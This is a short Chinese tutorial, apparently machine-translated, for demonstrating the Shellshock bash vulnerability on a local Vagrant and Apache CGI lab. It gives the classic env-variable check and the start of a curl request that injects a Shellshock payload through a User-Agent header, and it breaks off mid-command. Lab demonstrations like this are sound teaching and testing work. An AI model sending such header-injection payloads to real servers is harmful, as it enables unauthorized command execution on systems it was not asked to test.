开始演示 Shellshock 漏洞:
设置
使用这个 vagrant 文件设置一个 vagrant box。 这将安装 Apache 并转发到端口 8080..
在 /usr/lib/cgi-bin 中创建一个 cgi 文件。 它可以像 html 内容类型“hello world”一样简单。
针对测试以下漏洞
演示漏洞
通过命令行进行测试:
env x= ' () { :;}; echo vulnerable ' bash -c " echo this is a test "
(如果您看到“脆弱”,您需要更新 bash。否则,您应该很高兴。)
通过卷曲:
只回显数据:
curl -H " Useragent: () { :; }; echo \" Content-type: text/plain \" ; echo; echo; echo 'hi world of exploi
